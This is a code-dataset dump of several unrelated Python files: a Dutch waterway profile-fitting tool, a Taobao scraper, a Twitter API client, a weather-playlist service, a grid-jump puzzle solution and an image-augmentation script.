grootste(xy):\r\n index = 0\r\n m = 0\r\n for i in xy:\r\n if len(xy[i]) > 2:\r\n if (xy[i][-1][0] - xy[i][0][0]) > m:\r\n index = i\r\n m = xy[i][-1][0] - xy[i][0][0]\r\n return index\r\n\r\n\r\ndef mkgemprof(axyzlist, peil):\r\n \"\"\" Maak een shapely polygoon van het gemeten profiel (afstanden en diepte), doorsnijden met het peil\r\n helaas is split pas vanaf shapely versie 1.6 aanwezig (qgis 2.18 heeft shapely 1.2) daarom\r\n\r\n Invoer: list van lists met afstand, x, y en z\r\n peil\r\n Uitvoer: shapely polygon\r\n \"\"\"\r\n xy = {}\r\n tel = 0\r\n xy[tel] = []\r\n links = axyzlist[0]\r\n positie = 'b'\r\n for c in axyzlist[1:]:\r\n if positie == 'b':\r\n if c[3] < peil:\r\n xy[tel].append(interpoleerafstand(links, c, peil))\r\n xy[tel].append((c[0], c[3]))\r\n positie = \"o\"\r\n elif c[3] == peil:\r\n xy[tel].append((c[0], c[3]))\r\n positie = \"o\"\r\n else:\r\n if c[3] > peil:\r\n xy[tel].append(interpoleerafstand(links, c, peil))\r\n positie = \"b\"\r\n tel += 1\r\n xy[tel] = []\r\n elif c[3] == peil:\r\n xy[tel].append((c[0], c[3]))\r\n positie = \"b\"\r\n tel += 1\r\n xy[tel] = []\r\n else:\r\n xy[tel].append((c[0], c[3]))\r\n links = c\r\n if tel > 0:\r\n tel = grootste(xy)\r\n return shapely.geometry.Polygon(xy[tel])\r\n\r\n\r\ndef prof_in_prof(profgem, proftheo, aantstap=100, delta=0.001, obdiepte=0.001, debug=0):\r\n \"\"\"Het theoretisch profiel wordt in stapjes verschoven over het gemeten profiel (te beginnen links van het\r\n gemeten profiel zonder overlap, tot en met rechts van het gemeten profiel zonder overlap). Indien het\r\n theoretisch profiel nergens past binnen het gemeten profiel is de plek met het maximale oppervlak van de\r\n intersectie van het theoretisch met het gemeten profiel de optimale plek voor het theoretisch profiel,\r\n tenzij er een traject is met een gelijk maximaal oppervlak; in dat geval wordt het midden van dit traject de\r\n optimale plek voor het theoretisch profiel.\r\n Wanneer het oppervlak van deze intersectie gelijk is aan het oppervlak van het theoretisch profiel, dan\r\n past het theoretisch profiel volkomen binnen het gemeten profiel. In dat geval wordt het midden van het\r\n traject waarvoor het intersectie oppervlak gelijk is aan het oppervlak van het theoretisch profiel, de\r\n optimale plek voor het theoretisch profiel\r\n Invoer: profgem: het shapely polygoon van het gemeten profiel\r\n proftheo: het shapely polygoon van het theoretisch profiel\r\n aantstap: het aantal stappen dat gebruikt wordt voor de verschuiving van het theoretisch profiel\r\n delta: het acceptabele verschil om vast te stellen of twee oppervlakken gelijk zijn\r\n obdiepte: de diepte waarop de beschikbare overbreedte bepaald wordt\r\n Uitvoer: fit: de fractie van het oppervlak van het theoretisch profiel dat past binnen het gemeten\r\n optimaal: de optimale verschuiving (afstand) van het theoretisch profiel gemeten vanaf\r\n de start van het gemeten profiel\r\n fractie: 1 - de fractie van het gemeten profiel dat bedekt wordt door het theoretisch profiel\r\n overdiepte: de gemiddelde afstand onder rechte stuk van het theoretisch profiel tot het gemeten profiel\r\n linksover: de afstand tussen het gemeten profiel en het theoretisch profiel op obdiepte links\r\n rechtsover: de afstand tussen het gemeten profiel en het theoretisch profiel op obdiepte rechts\"\"\"\r\n\r\n waterbreedte_gemeten = profgem.bounds[2] - profgem.bounds[0]\r\n waterbreedte_theo = proftheo.bounds[2] - proftheo.bounds[0]\r\n waterdiepte_theo = proftheo.bounds[3] - proftheo.bounds[1]\r\n rhlb = proftheo.exterior.coords[1] # de linkerbovenhoek resp rechterbovenhoek van een rechthoek onder\r\n rhrb = proftheo.exterior.coords[2] # het rechte stuk van het theoretisch profiel (tbv overdiepte)\r\n oblijn = shapely.geometry.LineString([(0, profgem.bounds[3] - obdiepte),\r\n (waterbreedte_gemeten + 2 * waterbreedte_theo, profgem.bounds[3] - obdiepte)])\r\n if not oblijn.is_valid:\r\n logger.error('oblijn not valid. geom is: %s', oblijn.wkt)\r\n\r\n if not profgem.is_valid:\r\n logger.error('profgem not valid. geom is: %s', profgem.wkt)\r\n\r\n try:\r\n clijn = profgem.intersection(oblijn) # oblijn tbv overbreedte, clijn controle lijnstuk tbv overbreedte\r\n except TopologicalError as e:\r\n logger.error(e)\r\n return -99, -99, -99, -99, -99, -99\r\n\r\n gemprof = shapely.affinity.translate(profgem, -profgem.bounds[0], 0.0, 0.0) # op nul meter laten beginnen\r\n profzoek = shapely.affinity.translate(proftheo, -waterbreedte_theo, 0.0, 0.0) # verschuif naar nul overlap\r\n stap = (waterbreedte_gemeten + waterbreedte_theo + waterbreedte_theo) / aantstap\r\n zoekopp = profzoek.area # het oppervlak van het theoretisch profiel\r\n maxopp = -9.9 # het maximale oppervlak van de intersectie\r\n traject = '' # in traject komt per stap een 0 of 1 (1 indien maxopp == zoekopp)\r\n optimaal = -waterbreedte_theo # dit is de start van het theoretisch profiel, overlap is nul!\r\n fit = 0 # de verhouding maxopp / zoekopp (een goodness of fit)\r\n # logger.debug(\"wb_gem: %.2f, wb_theo: %.2f; stap: %.2f, zoekopp: %.3f\",\r\n # waterbreedte_gemeten, waterbreedte_theo, stap, zoekopp)\r\n for i in range(aantstap):\r\n profzoek = shapely.affinity.translate(profzoek, stap, 0.0, 0.0)\r\n inter = gemprof.intersection(profzoek)\r\n if abs(zoekopp - inter.area) < delta: # opp intersectie == zoekopp dus past profzoek volledig in gemprof\r\n optimaal = profzoek.bounds[0]\r\n maxopp = inter.area\r\n traject += '1'\r\n # logger.debug('Volledig: optimaal: %f; maxopp: %f', optimaal, maxopp)\r\n else:\r\n if inter.area == maxopp:\r\n traject += '2'\r\n elif inter.area > maxopp: # opp intersectie groter dan voorgaand oppervlak\r\n optimaal = profzoek.bounds[0]\r\n maxopp = inter.area\r\n traject = traject.replace('2', '0') # evt oud traject met kleiner oppervlak weghalen\r\n traject += '2'\r\n # logger.debug('Niet vol: optimaal: %f; maxopp: %f', optimaal, maxopp)\r\n else:\r\n traject += '0'\r\n fit = maxopp / zoekopp # de best fit\r\n fractie = (gemprof.area - maxopp) / gemprof.area # de overblijvende fractie oppervlak van het gemetenprofiel\r\n # logger.debug('Na loop: Fit: %.3f; optimaal: %f', fit, optimaal)\r\n # logger.debug(traject)\r\n\r\n if traject.find('1') > 0: # er zijn 1 tekens in traject\r\n traject = traject.replace('2', '0') # evt oud traject met kleiner oppervlak weghalen\r\n zoek = max(traject.split('0')) # in zoek komt de eerste langste reeks 1 tekens in traject\r\n astap = traject.find(zoek) + len(zoek) / 2.0 + 1\r\n optimaal = astap * stap\r\n optimaal -= waterbreedte_theo # corrigeer voor de verschuiving van het theoretisch profiel\r\n elif traject.find('2') > 0: # er zijn trajecten met een kleiner oppervlak\r\n zoek = max(traject.split('0')) # in zoek komt de eerste langste reeks 1 tekens in traject\r\n astap = traject.find(zoek) + len(zoek) / 2.0 + 1\r\n optimaal = astap * stap\r\n optimaal -= waterbreedte_theo # corrigeer voor de verschuiving van het theoretisch profiel\r\n optimaal += profgem.bounds[0] # corrigeer voor de verschuiving van het gemeten profiel\r\n # logger.debug(\"optimaal: %f\", optimaal)\r\n roth = shapely.affinity.translate(mkrechthoekondertheoprofiel(rhlb, rhrb), optimaal, 0.0, 0.0)\r\n poloth = profgem.intersection(roth)\r\n overdiepte = poloth.area / (rhrb[0] - rhlb[0]) # oppervlak gedeeld door breedte geeft diepte\r\n\r\n linksover = 0.0\r\n rechtsover = 0.0\r\n restbak = profgem.difference(shapely.affinity.translate(proftheo, optimaal, 0.0, 0.0))\r\n hlijn = restbak.intersection(oblijn) # restbak is restant gemeten profiel min theor. profiel\r\n if obdiepte < (profgem.bounds[3] - profgem.bounds[1]): # de obdiepte is hoger dan de bodem van het gemetenprofiel\r\n try:\r\n xlinks = clijn.coords[0][0]\r\n xrechts = clijn.coords[1][0]\r\n\r\n try:\r\n if len(hlijn) == 2: # is hlijn een MultiLineString van twee LineStrings\r\n if (hlijn[0].coords[0][0] == xlinks) and (hlijn[1].coords[1][0] == xrechts):\r\n linksover = hlijn[0].length\r\n rechtsover = hlijn[1].length\r\n elif len(hlijn) == 3: # is hlijn een MultiLineString van drie LineStrings\r\n # logger.debug(\"hlijn 3 stuks, xl, xr, hl\", xlinks, xrechts, hlijn)\r\n if (hlijn[0].coords[1][0] == xlinks) and (hlijn[2].coords[1][0] == xrechts):\r\n linksover = hlijn[1].length\r\n rechtsover = hlijn[2].length\r\n except:\r\n # logger.info(\"hlijn is geen MultiLineString\")\r\n pass\r\n except:\r\n # logger.info(\"clijn is geen LineString\")\r\n pass\r\n return fit, optimaal, fractie, overdiepte, linksover, rechtsover\r\n\r\n\r\ndef altertable(cur, tabelnaam, veldnaam, veldtype):\r\n \"\"\"\"Primitieve alter table voor float, integer, double met controle of het veld al bestaat\"\"\"\r\n gevonden = 0\r\n for r in cur.execute('pragma table_info(\"%s\")' % tabelnaam):\r\n if r[1] == veldnaam:\r\n gevonden = 1\r\n if not gevonden:\r\n cur.execute('alter table \"%s\" add column \"%s\" \"%s\"' % (tabelnaam, veldnaam, veldtype))\r\n return\r\n\r\n\r\ndef maaktabellen(cur):\r\n \"\"\"\"Maak de tabellen met verrijkte platgeslagen profielen tbv presentatie\r\n presentatie: klik op de kaart nabij een hydroobject en een profiel (selecteer dichtstbijzijnde,\r\n een hydroobject kan meer gemeten profielen hebben!!\r\n tabel hyob_voorkeurpeil geeft op grond van het id van het hydroobject het gekozen peil (kan natuurlijk\r\n ook als view, maar dit zal sneller zijn, geen idee of het van belang is)\r\n tabel profielfiguren is een platte tabel met alle info voor figuren met gemeten en theoretische profielen\r\n met infor over fit, overdiepte enz enz.\r\n\r\n Aanpassing van bestaande tabellen:\r\n hydroobject met voorkeurpeil\r\n profielpunten met afstand\r\n \"\"\"\r\n # altertable(cur, \"hydroobject\", \"voorkeurpeil\", \"float\")\r\n # altertable(cur, \"profielpunten\", \"afstand\", \"float\")\r\n\r\n # cur.execute('drop table if exists hyob_voorkeurpeil')\r\n # cur.execute('create table hyob_voorkeurpeil (id integer primary key, voorkeurpeil float)')\r\n cur.execute('drop table if exists profielfiguren')\r\n cur.execute('drop index if exists profielfiguren0')\r\n cur.execute('drop index if exists profielfiguren1')\r\n cur.execute('create table profielfiguren(id_hydro integer, profid varchar(16), type_prof char(1), coord text, '\r\n 'peil float, t_talud float, t_waterdiepte float, t_bodembreedte float, t_fit float, t_afst float, '\r\n 'g_rest float, t_overdiepte float, t_overbreedte_l float, t_overbreedte_r float)')\r\n cur.execute('vacuum')\r\n return\r\n\r\n\r\ndef controlefig(gemprof, theoprof, afstand, fit, fractie, overdiepte, overlinks, overrechts, hydroid, profid,\r\n talud, diepte, breedte, peil):\r\n fnm = 'cf/%d_%d_%d_%.2f_%.2f' % (profid, hydroid, talud, diepte, breedte)\r\n fnm = fnm.replace('.', ',')\r\n txt1 = 'Hydroid: %d, profid: %d, peil: %.2f; Talud: %d; Waterdiepte: %.2f; Bodembreedte: %2f.' % \\\r\n (hydroid, profid, peil, talud, diepte, breedte)\r\n txt2 = 'Fit: %.2f; Fractie %.2f, Overdiepte %.3f; Overbreedte links: %.1f; Overbreedte rechts: %.1f.' % \\\r\n (fit, fractie, overdiepte, overlinks, overrechts)\r\n blue = '#6699cc'\r\n orange = '#cc9933'\r\n fig, ax = plt.subplots()\r\n fig.text(0.95, 0.15, txt1,\r\n fontsize=7, color='black',\r\n ha='right', va='bottom', alpha=0.9)\r\n fig.text(0.95, 0.10, txt2,\r\n fontsize=7, color='black',\r\n ha='right', va='bottom', alpha=0.9)\r\n p2 = PolygonPatch(gemprof, fc=blue, ec=blue, alpha=0.5)\r\n ax.add_patch(p2)\r\n p1 = PolygonPatch(shapely.affinity.translate(theoprof, afstand, 0.0, 0.0), fc=orange, ec=orange, alpha=0.5)\r\n ax.add_patch(p1)\r\n ax.axis('scaled')\r\n savefig(fnm, dpi=200)\r\n plt.close()\r\n return\r\n\r\n\r\ndef doe_profinprof(cur0, cur1, aantalstappen=200, precisie=0.0001, codevastebodem=\"Z1\",\r\n obdiepte=0.001, debug=0, profiel_id=None):\r\n \"\"\"\r\n\r\n :param cur0: cursor naar de legger database\r\n :param cur1: cursor naar de legger database\r\n :param aantalstappen:\r\n :param precisie:\r\n :param codevastebodem:\r\n :param obdiepte:\r\n :param debug:\r\n :return:\r\n \"\"\"\r\n\r\n gemetenprofielen = haal_meetprofielen1(cur0, codevastebodem, profiel_id)\r\n\r\n # alleen theoretische profielen die liggen in hydro-objecten waar ook gemeten profielen zijn ophalen\r\n q = \"\"\"select id, id, talud, diepte, bodembreedte from varianten where hydro_id='%s'\"\"\"\r\n qm = \"\"\"insert into profielfiguren (id_hydro, profid, type_prof, coord, peil) values (%d, \"%s\", \"m\", \"%s\", %f)\"\"\"\r\n qt = \"\"\"insert into profielfiguren (id_hydro, profid, type_prof, coord, peil, t_talud, t_waterdiepte, t_bodembreedte, \r\n t_fit, t_afst, g_rest, t_overdiepte, t_overbreedte_l, t_overbreedte_r) values \r\n (%d, \"%s\", \"t\", \"%s\", %f, %f, %f, %f, %f, %f, %f, %f, %f, %f)\"\"\"\r\n for profielid, profiel in gemetenprofielen.items():\r\n try:\r\n # mkgemprof aanroepen met list van lists met afstand, x, y, z (geprojecteerd); en het peil;\r\n # levert een shapely polygoon\r\n gemprofshapely = mkgemprof(profiel['proj'], profiel['peil'])\r\n\r\n if gemprofshapely.is_empty:\r\n logger.warning('Profiel %s (%i) geeft een lege profiel geometry terug. skip profiel',\r\n profiel['proident'], profielid)\r\n continue\r\n\r\n h = qm % (profiel['hydroid'], profiel['proident'],\r\n gemprofshapely.wkt, profiel['peil'])\r\n # logger.debug(h)\r\n cur1.execute(h)\r\n cur0.execute(q % profiel['hydroid'])\r\n for theo_data in cur0.fetchall():\r\n # mkmogelijkprofiel aanroepen met talud, waterdiepte, bodembreedte en peil, levert een shapely polygon\r\n theoprofshapely = mkmogelijktheoprofiel(theo_data[2], theo_data[3], theo_data[4],\r\n profiel['peil'])\r\n # prof_in_prof aanroepen met gemetenprofiel, theoretisch profiel aantal stappen en aanvaardbaar verschil\r\n # (profielen bestaan uit shapely polygons)\r\n fit, afstand, fractie, overdiepte, overlinks, overrechts = \\\r\n prof_in_prof(gemprofshapely, theoprofshapely, aantalstappen, precisie, obdiepte, debug)\r\n\r\n cur1.execute(qt % (profiel['hydroid'], theo_data[1],\r\n shapely.affinity.translate(theoprofshapely, afstand, 0.0, 0.0).wkt,\r\n profiel['peil'], theo_data[2], theo_data[3], theo_data[4],\r\n fit, afstand, fractie, overdiepte, overlinks, overrechts))\r\n except Exception as e:\r\n logger.error('Fout in verwerken profiel %s (%i), hydrovak_id %s', profiel['proident'], profielid,\r\n profiel['hydroid'])\r\n logger.exception(e)\r\n\r\n cur0.execute('CREATE INDEX IF NOT EXISTS profielfiguren0 on profielfiguren(id_hydro)')\r\n cur0.execute('CREATE INDEX IF NOT EXISTS profielfiguren1 on profielfiguren(profid)')\r\n # cur0.execute('vacuum')\r\n resultaat = \"klaar\"\r\n\r\n return resultaat\r\n\r\n\r\nif __name__ == '__main__':\r\n import sys\r\n\r\n os.environ[\"PROJ_LIB\"] = \"/Applications/QGIS-LTR.app/Contents/Resources/proj\"\r\n os.environ[\"GDAL_DATA\"] = \"/Applications/QGIS-LTR.app/Contents/Resources/gdal\"\r\n sys.path.append('/Users/bastiaanroos/Library/Application Support/QGIS/QGIS3/profiles/default/python/plugins')\r\n\r\n conn = load_spatialite('//Users/bastiaanroos/Documents/testdata/leggertool/legger_hub_update_bastiaan2.sqlite')\r\n cur0 = conn.cursor()\r\n cur1 = conn.cursor()\r\n #\r\n resultaat = doe_profinprof(cur0, cur1, debug=True)\r\n print(resultaat)\r\n a = 1\r\n","repo_name":"hhnk-git/legger","sub_path":"utils/profile_match_a.py","file_name":"profile_match_a.py","file_ext":"py","file_size_in_byte":26469,"program_lang":"python","lang":"nl","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"26351838512","text":"import dataclasses\nimport os\n\nfrom selenium import webdriver\nfrom selenium.webdriver.remote.webdriver import WebDriver\n\nfrom scrape_taobao.commands import ITEMS_DIR, PAGES_DIR, logger\nfrom scrape_taobao.core.fetch_item_page import fetch_item_page\nfrom scrape_taobao.core.hack import hide_browser_features, prompt_and_login\nfrom scrape_taobao.core.parse_item_page import parse_item_page\nfrom scrape_taobao.io import dump\n\n\ndef scrape_one(\n url: str,\n *,\n out_dir: str = ITEMS_DIR,\n pages_dir: str = PAGES_DIR,\n fmt: str = \"yaml\",\n download_only: bool = False,\n no_cache: bool = False,\n):\n \"\"\"\n 抓取商品页面,并解析商品信息。\n\n :param url: 商品链接列表文件,每行一个链接\n :param out_dir: 输出目录,默认为 '/cache/items'\n :param pages_dir: 页面源码目录,默认为 '/cache/pages'\n :param fmt: 输出格式,支持 'json' 和 'yaml'\n :param download_only: 是否只下载页面源码,不解析\n :param no_cache: 是否跳过缓存,即不使用已下载的页面源码\n \"\"\"\n\n os.makedirs(pages_dir, exist_ok=True)\n os.makedirs(out_dir, exist_ok=True)\n\n with webdriver.Chrome() as driver:\n hide_browser_features(driver)\n prompt_and_login(driver)\n\n try:\n scrape_one_impl(\n url,\n driver,\n out_dir=out_dir,\n pages_dir=pages_dir,\n fmt=fmt,\n download_only=download_only,\n no_cache=no_cache,\n )\n\n except Exception as e:\n logger.exception('failed to scrape \"{}\": {}'.format(url, e))\n\n\ndef scrape_one_impl(\n url: str,\n driver: WebDriver,\n *,\n out_dir: str = ITEMS_DIR,\n pages_dir: str = PAGES_DIR,\n fmt: str = \"yaml\",\n download_only: bool = False,\n no_cache: bool = False,\n log=logger.info,\n):\n \"\"\"\n Scrape a single item page from the given url.\n\n See also the docstring of `scrape_one`.\n \"\"\"\n item_id = url[url.index(\"id=\") :]\n page_filepath = os.path.join(pages_dir, \"{}.html\".format(item_id))\n out_filepath = os.path.join(out_dir, \"{}.{}\".format(item_id, fmt))\n\n # skip if item file exists\n if not no_cache and os.path.exists(out_filepath):\n log('skip scrape \"{}\" as existing'.format(item_id))\n return\n\n # skip if page source file exists\n if not no_cache and os.path.exists(page_filepath):\n # load page source\n page_source = open(page_filepath).read()\n\n log('skip fetch \"{}\" as existing'.format(item_id))\n\n else:\n try:\n # fetch page source\n page_source = fetch_item_page(driver, url)\n except Exception as e:\n log('failed to fetch \"{}\": {}'.format(url, e))\n raise\n\n log('fetched \"{}\" - {}'.format(item_id, driver.title))\n\n if not no_cache:\n with open(page_filepath, \"w+\") as f:\n f.write(page_source)\n\n if not download_only:\n try:\n # parse page source\n item = parse_item_page(page_source)\n except Exception as e:\n log('failed to parse \"{}\": {}'.format(url, e))\n raise\n\n dump(dataclasses.asdict(item), out_filepath, fmt=fmt)\n","repo_name":"limoiie/scrape-taobao","sub_path":"scrape_taobao/commands/scrape_one.py","file_name":"scrape_one.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71540655521","text":"import json\nimport os\nfrom tweepy import API\nfrom tweepy import Cursor\nfrom tweepy.streaming import StreamListener\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nimport re\n\n######################################################################################################################\n# Class TwitterAuthenticator\n# - Handles Twitter authentication and the connection to Twitter Streaming API.\n######################################################################################################################\t\nclass TwitterAuthenticator():\n\n def __init__(self):\n #Get the dictionary of twitter OAth keys\n self.this_folder = os.path.dirname(os.path.abspath(__file__))\n self.keys_file = os.path.join(self.this_folder, \"twitterKeys.json\")\n\n def authenticate_twitter_app(self):\n try:\n twitterKeyFile = open(self.keys_file)\n except OSError:\n print(\"Error! Cannot open: \", self.keys_file)\n\n twitterKeys = json.load(twitterKeyFile)\n\n #API key & API secret key goes here...\n auth = OAuthHandler(twitterKeys.get(\"consumer_key\"),\n twitterKeys.get(\"consumer_secret\"))\n\n #API Access token & secret token\n auth.set_access_token(twitterKeys.get(\"access_token_key\"),\n twitterKeys.get(\"access_token_secret\"))\n return auth\n\n######################################################################################################################\n# Class TwitterStreamer\n# - Class for streaming and processing live tweets.\n######################################################################################################################\t\nclass TwitterStreamer():\n\n def __init__(self):\n self.twitter_authenticator = TwitterAuthenticator()\n\n def stream_tweets(self, fetched_tweet_filename, hash_tag_list):\n \n listener = TwitterListener(fetched_tweet_filename)\n auth = self.twitter_authenticator.authenticate_twitter_app()\n\n stream = Stream(auth, listener)\n\n # This line filters Twitter Streams to capture data by the keywords: \n stream.filter(track=hash_tag_list)\n\n######################################################################################################################\n# Class TwitterListener\n######################################################################################################################\nclass TwitterListener(StreamListener):\n \n def __init__(self, fetched_tweet_filename):\n self.fetched_tweets_filename = fetched_tweet_filename\n\n def on_data(self, data):\n try:\n #Deserialize strin and create python object\n jsonTweets = json.loads(data)\n\n #Append to the file...\n with open(self.fetched_tweets_filename, \"a\") as f:\n json.dump(jsonTweets,f, indent=2)\n except BaseException as e:\n print(\"Error on_data: %s\", str(e))\n return True\n\n def on_error(self, status):\n # Check if we're being rate limited for making too many requests to Twitter\n if status == 420:\n return False\n print(status)\n\n######################################################################################################################\n# Class TwitterClient\n# - Client API functions\n######################################################################################################################\nclass TwitterClient():\n def __init__(self, twitter_user=None):\n self.auth = TwitterAuthenticator().authenticate_twitter_app()\n self.twitter_client = API(self.auth)\n self.twitter_user = twitter_user\n\n def get_twitter_client_api(self):\n return self.twitter_client\n\n #########################################################\n # Function get_user_timeline_tweets\n # - Gets the specified user's timeline tweets \n # - num_tweets is the # of tweets to get from timeline\n # - if no user, gets the API user's tweets\n #########################################################\n def get_user_timeline_tweets(self, screen_name, num_tweets):\n my_tweets = []\n for tweet in Cursor(self.twitter_client.user_timeline, tweet_mode=\"extended\", screen_name=screen_name).items(num_tweets):\n my_tweets.append(tweet)\n return my_tweets\n\n #########################################################\n # Function get_friend_list\n # - Gets the specified user's twitter friends \n # - num_friends is the # of tweets to get from timeline\n # - if no user, gets the API user's friends\n #########################################################\n def get_friend_list(self, num_friends):\n friend_list = []\n for friend in Cursor(self.twitter_client.friends, id=self.twitter_user).items(num_friends):\n friend_list.append(friend)\n return friend_list\n\n #########################################################\n # Function search_for_tweet\n # - search query string of 500 characters maximum\n #########################################################\n def search_for_tweet(self, query_str, count):\n #Check character count... \n if(len(query_str) >= 500):\n print(\"Exceeded Max character count in query!\")\n return False\n else:\n found_tweets = []\n for tweet in Cursor(self.twitter_client.search, q=query_str, count=count).items(count):\n found_tweets.append(tweet)\n return found_tweets\n","repo_name":"CUBigDataClass/covid-19-rhetoric","sub_path":"api/pythonTwitterAPI.py","file_name":"pythonTwitterAPI.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"19795536481","text":"# PROJECT IMPORTS\nfrom src.domain.exceptions.exceptions import InvalidParamsWereSent\nfrom src.domain.models.weather.models import CoordinatesModel, CityModel\nfrom src.services.spotify.services import SpotifyPlaylistsService\nfrom src.services.weather.services import WeatherAPIService\n\n\nclass MainServiceWeatherPlaylist:\n\n @classmethod\n def get_playlists(cls, temperature: float) -> list:\n\n if temperature > 30:\n party_response = SpotifyPlaylistsService.party_playlist_objects()\n return party_response\n\n if 15 <= temperature <= 30:\n pop_response = SpotifyPlaylistsService.pop_playlist_objects()\n return pop_response\n\n if 10 <= temperature <= 14:\n rock_response = SpotifyPlaylistsService.rock_playlist_objects()\n return rock_response\n\n if temperature < 10:\n classic_response = SpotifyPlaylistsService.classic_playlist_objects()\n return classic_response\n\n @classmethod\n def get_service_response(\n cls,\n coordinate_model: CoordinatesModel = None,\n city_model: CityModel = None\n ):\n\n if coordinate_model.latitude and coordinate_model.longitude:\n weather_response, temperature = WeatherAPIService.get_weather_information_coordinates(\n coordinates_model=coordinate_model\n )\n\n playlist_response = cls.get_playlists(\n temperature=temperature\n )\n\n response_dict = {\n \"tracks_for_you\": playlist_response,\n \"about_your_weather\": weather_response\n }\n\n return response_dict\n\n elif city_model.city:\n\n weather_response, temperature = WeatherAPIService.get_weather_information_by_city(\n city_model=city_model\n )\n\n playlist_response = cls.get_playlists(\n temperature=temperature\n )\n\n response_dict = {\n \"tracks_for_you\": playlist_response,\n \"about_your_weather\": weather_response\n }\n\n return response_dict\n\n else:\n raise InvalidParamsWereSent\n","repo_name":"renatamoon/isis_api","sub_path":"src/services/main_service/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"70681054241","text":"# 점프\n\nimport sys\n\ninput = sys.stdin.readline\n\nn = int(input())\narr = [list(map(int, input().split())) for _ in range(n)]\ndp = [[0] * n for _ in range(n)]\ndp[0][0] = 1\n\n\nfor i in range(n):\n for j in range(n):\n if i == n-1 and j == n-1:\n break\n \n temp = arr[j][i]\n if i + temp < n:\n dp[j][i + temp] += dp[j][i]\n\n if j + temp < n:\n dp[j + temp][i] += dp[j][i]\n\nprint(dp[n-1][n-1])","repo_name":"GGamangCoder/BOJ","sub_path":"1890.py","file_name":"1890.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"71888054562","text":"import cv2\nimport numpy as np\nimport os\nimport random\nimport matplotlib.pyplot as plt\n\nfrom glob import glob\n\n# Rutas a las carpetas de imágenes y máscaras\nimage_folder = 'Final_dataset_small2/*/*.jpg'\nmask_folder = 'masks/*/*.png'\n\n# Obtenemos todas las imágenes y máscaras\nmask_files = glob(mask_folder)\n\nclass_index = dict(enumerate(os.listdir('Final_dataset_small2')))\nclass_index = {v: k+1 for k, v in class_index.items()}\n\n# Funciones de transformación\ndef translate_image(img, x, y):\n rows, cols = img.shape[:2]\n M = np.float32([[1, 0, x], [0, 1, y]])\n return cv2.warpAffine(img, M, (cols, rows))\n\ndef rotate_image(img, angle):\n rows, cols = img.shape[:2]\n M = cv2.getRotationMatrix2D((cols / 2, rows / 2), angle, 1)\n return cv2.warpAffine(img, M, (cols, rows))\n\ndef scale_image(img, fx, fy):\n # Redimensionar la imagen\n resized = cv2.resize(img, None, fx=fx, fy=fy, interpolation=cv2.INTER_LINEAR)\n \n # Verificar si la imagen es en color o en escala de grises\n if len(img.shape) == 3:\n color = [0,0,0] # Color para los bordes (negro)\n else:\n color = [0] # Color para los bordes (negro)\n \n # Si la imagen es más pequeña, agregar bordes\n if fx < 1.0 or fy < 1.0:\n # Calcular las dimensiones del borde\n top = max(0, int((img.shape[0] - resized.shape[0]) / 2))\n bottom = max(0, int((img.shape[0] - resized.shape[0] + 1) / 2)) # +1 para compensar el redondeo\n left = max(0, int((img.shape[1] - resized.shape[1]) / 2))\n right = max(0, int((img.shape[1] - resized.shape[1] + 1) / 2)) # +1 para compensar el redondeo\n \n # Crear bordes\n resized = cv2.copyMakeBorder(resized, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color)\n \n # Si la imagen es más grande, recortarla\n elif fx > 1.0 or fy > 1.0:\n # Calcular las dimensiones del recorte\n dy = int((resized.shape[0] - img.shape[0]) / 2)\n dx = int((resized.shape[1] - img.shape[1]) / 2)\n \n # Recortar la imagen\n resized = resized[dy:dy+img.shape[0], dx:dx+img.shape[1]]\n \n return resized\n\ndef change_brightness(img, value):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n h, s, v = cv2.split(hsv)\n v = cv2.add(v, value)\n v[v > 255] = 255\n v[v < 0] = 0\n return cv2.cvtColor(cv2.merge((h, s, v)), cv2.COLOR_HSV2BGR)\n\nindex = 0\n\n# Loop de transformación y creación de nuevas imágenes\nfor _ in range(5):\n for mask_file in mask_files:\n try:\n class_name = mask_file.split('\\\\')[1]\n image_file = mask_file.replace('masks', 'Final_dataset_small2').replace('png', 'jpg')\n \n img = cv2.imread(image_file)\n #img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n \n new_img = np.zeros(img.shape, img.dtype)\n\n mask_img = cv2.imread(mask_file, cv2.IMREAD_GRAYSCALE)\n mask_img[mask_img > 0] = class_index[class_name]\n new_img[mask_img > 0] = img[mask_img > 0]\n\n number = random.randint(1, 2)\n\n mask_files_sample = random.sample(mask_files, number)\n except:\n continue\n\n for mask_file2 in mask_files_sample:\n try:\n class_name_2 = mask_file2.split('\\\\')[1]\n img_n = cv2.imread(mask_file2.replace('masks', 'Final_dataset_small2').replace('png', 'jpg'))\n #img_n = cv2.cvtColor(img_n, cv2.COLOR_BGR2RGB)\n mask = cv2.imread(mask_file2, cv2.IMREAD_GRAYSCALE)\n\n tx = random.randint(-80, 80)\n ty = random.randint(-80, 80)\n r = random.randint(-180, 180)\n fx = random.uniform(0.5, 0.8)\n fy = random.uniform(0.5, 0.8)\n mask = translate_image(mask, tx, ty)\n img_n = translate_image(img_n, tx, ty)\n mask = rotate_image(mask, r)\n img_n = rotate_image(img_n, r)\n mask = scale_image(mask, fx, fy)\n img_n = scale_image(img_n, fx, fy)\n \n #img_n = change_brightness(img_n, random.randint(-50, 50))\n\n mask_indices = mask > 0\n \n new_img[mask_indices] = img_n[mask_indices]\n mask_img[mask_indices] = class_index[class_name_2]\n except:\n pass\n\n # Guardar la imagen aumentada\n try:\n out_name = os.path.join('augmented_images', str(index))\n cv2.imwrite(out_name + '.jpg', new_img)\n cv2.imwrite(out_name + '.png', mask_img)\n index += 1\n except:\n pass\n ","repo_name":"juanmacaaz/ecomate","sub_path":"Pruebas - 